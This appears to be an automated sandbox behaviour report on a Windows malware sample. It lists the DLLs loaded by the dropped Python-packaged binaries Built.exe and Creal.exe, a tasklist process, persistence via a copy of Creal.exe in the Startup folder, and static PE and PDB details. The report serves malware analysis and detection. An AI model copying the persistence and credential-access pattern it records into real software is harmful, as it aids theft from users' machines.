              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: python3.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: libffi-8.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: sqlite3.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: libcrypto-3.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: libssl-3.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: libffi-8.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: vcruntime140_1.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: libcrypto-3.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: libssl-3.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: sqlite3.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\curl.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: vcruntime140.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: libffi-8.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: vcruntime140_1.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: libcrypto-3.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: libssl-3.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: sqlite3.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: mswsock.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: ntmarta.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: dpapi.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: msasn1.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: dnsapi.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: rasadhlp.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: fwpuclnt.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: textshaping.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: textinputframework.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: coreuicomponents.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: coremessaging.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\curl.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic file information: File size 24810296 > 1048576
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: Built.exe, 00000004.00000002.2178299171.00007FFD945E2000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: Built.exe, 00000004.00000002.2174319027.00007FFD9253F000.00000040.00000001.01000000.0000001F.sdmp, Creal.exe, 00000005.00000002.2432361806.00007FFD89E27000.00000002.00000001.01000000.00000032.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: Built.exe, 00000004.00000002.2175008965.00007FFD93AAA000.00000040.00000001.01000000.00000018.sdmp, Creal.exe, 00000005.00000002.2434226473.00007FFD8B43A000.00000002.00000001.01000000.00000029.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: Built.exe, 00000004.00000002.2174692109.00007FFD93615000.00000040.00000001.01000000.00000019.sdmp, Creal.exe, 00000005.00000002.2433373548.00007FFD8AFA5000.00000002.00000001.01000000.0000002D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb(('GCTL source: Creal.exe, 00000005.00000002.2439456162.00007FFDA4634000.00000002.00000001.01000000.00000024.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: Creal.exe, 00000002.00000003.2116454412.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: Creal.exe, 00000002.00000003.2113278532.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.2098974146.00000124EBC30000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2210158040.00007FFDA54E3000.00000002.00000001.01000000.0000000C.sdmp, Creal.exe, 00000005.00000002.2439290824.00007FFDA4174000.00000002.00000001.01000000.00000016.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: Built.exe, 00000004.00000002.2175008965.00007FFD93A12000.00000040.00000001.01000000.00000018.sdmp, Creal.exe, 00000005.00000002.2434226473.00007FFD8B3A2000.00000002.00000001.01000000.00000029.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: Creal.exe, 00000002.00000003.2113278532.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.2098974146.00000124EBC30000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2210158040.00007FFDA54E3000.00000002.00000001.01000000.0000000C.sdmp, Creal.exe, 00000005.00000002.2439290824.00007FFDA4174000.00000002.00000001.01000000.00000016.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: Built.exe, Built.exe, 00000004.00000002.2198401846.00007FFDA3421000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: Built.exe, Built.exe, 00000004.00000002.2175008965.00007FFD93AAA000.00000040.00000001.01000000.00000018.sdmp, Creal.exe, 00000005.00000002.2434226473.00007FFD8B43A000.00000002.00000001.01000000.00000029.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: Creal.exe, 00000002.00000003.2116245484.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: Creal.exe, 00000002.00000003.2114341483.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: Built.exe, 00000004.00000002.2211113612.00007FFDA5B81000.00000040.00000001.01000000.00000014.sdmp, Creal.exe, 00000005.00000002.2438100824.00007FFD9F7F3000.00000002.00000001.01000000.0000002B.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: Built.exe, 00000004.00000002.2207256705.00007FFDA46E1000.00000040.00000001.01000000.0000000D.sdmp, Creal.exe, 00000005.00000002.2437686483.00007FFD9F3D3000.00000002.00000001.01000000.0000001B.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: Creal.exe, 00000002.00000003.2115776871.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Built.exe, Built.exe, 00000004.00000002.2205132237.00007FFDA3AE1000.00000040.00000001.01000000.0000001D.sdmp, Creal.exe, 00000005.00000002.2438752621.00007FFDA3BF6000.00000002.00000001.01000000.00000028.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: Built.exe
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: Creal.exe, 00000002.00000003.2115977535.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2203329287.00007FFDA35EC000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: Creal.exe, 00000002.00000003.2114531562.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: Creal.exe, 00000005.00000002.2437048857.00007FFD9DA42000.00000002.00000001.01000000.00000026.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: Creal.exe, 00000002.00000003.2116638050.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2208486691.00007FFDA4DA1000.00000040.00000001.01000000.0000001E.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: Creal.exe, 00000002.00000003.2115977535.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2203329287.00007FFDA35EC000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: Creal.exe, 00000002.00000003.2114770522.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2209383720.00007FFDA54BE000.00000040.00000001.01000000.00000010.sdmp, Creal.exe, 00000005.00000002.2438283541.00007FFDA086D000.00000002.00000001.01000000.00000021.sdmp
